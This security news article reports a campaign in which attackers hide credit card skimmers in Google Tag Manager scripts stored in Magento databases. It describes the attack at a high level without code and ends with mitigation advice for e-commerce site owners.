Threat Actors Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Websites

Cybercriminals have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware, targeting e-commerce websites running on the Magento platform.

How the Attack Works

According to website security company Sucuri, attackers are embedding malicious scripts within GTM containers. While these scripts appear to be legitimate Google Analytics or advertising scripts, they actually contain obfuscated backdoors that provide persistent access to compromised websites.

The attack method involves:

• Injecting malicious GTM scripts into a Magento site's database.

• Embedding encoded JavaScript payloads within GTM tags to execute credit card skimming.

• Stealing sensitive payment data from checkout pages.

• Transmitting stolen credit card information to attacker-controlled remote servers.

Sucuri initially identified six infected websites but has since reported that three remain actively compromised, all linked to the GTM identifier GTM-MLHK2N68.

Google Tag Manager as an Attack Vector

Google Tag Manager (GTM) is a legitimate service used for managing various tracking codes, such as Google Analytics and Facebook Pixel, without requiring direct changes to a website's source code. However, attackers exploit GTM by injecting malicious JavaScript into a compromised website’s Magento database table (specifically, cms_block.content), allowing them to bypass security measures.

Once executed, the JavaScript:

1. Harvests credit card details entered by customers on checkout pages.

2. Sends the stolen payment data to an external command-and-control (C2) server controlled by attackers.

Ongoing Threat of Google Tag Manager Abuse

This is not the first time Google Tag Manager has been misused by threat actors:

• In April 2018, Sucuri discovered that GTM was being abused for malvertising, where attackers inserted malicious ads to distribute malware.

• More recently, attackers have used GTM-based skimming attacks to target major e-commerce platforms, taking advantage of third-party scripts that site owners commonly integrate for analytics and advertising.

Recent Trends in Web-Based Malware Attacks

This attack comes just weeks after Sucuri uncovered another campaign targeting WordPress sites:

• Attackers exploited vulnerabilities in plugins or hijacked admin accounts to install malware.

• The malware redirected site visitors to malicious URLs, leading to phishing pages or exploit kits.

Mitigation Strategies for Website Owners

Given the stealthy nature of these attacks, e-commerce site administrators should take proactive security measures to prevent GTM-based malware infections. Recommended actions include:

1. Regularly audit GTM configurations

   • Check for unauthorized GTM containers or unexpected script modifications.

2. Restrict access to GTM and third-party scripts

   • Implement strict Content Security Policies (CSPs) to prevent unauthorized script execution.

3. Monitor Magento database tables for anomalies

   • Pay special attention to cms_block.content and other areas where attackers might inject malicious code.

4. Use real-time security monitoring tools

   • Solutions like Web Application Firewalls (WAF) and Intrusion Detection Systems (IDS) can help detect malicious script injections.

5. Regular security scans and malware removal

   • Conduct automated security scans using tools like Sucuri SiteCheck or Google Search Console's Security Issues report.

6. Ensure all Magento extensions and plugins are up to date

   • Outdated software often contains vulnerabilities that attackers exploit for initial access.

Conclusion

The use of Google Tag Manager as a malware delivery system highlights the growing sophistication of modern credit card skimming attacks. As e-commerce platforms like Magento continue to be high-value targets, businesses must adopt strict security measures to protect their customers’ financial data.

By auditing GTM configurations, monitoring database activity, and keeping software up to date, website owners can significantly reduce the risk of credit card skimmers compromising their platforms.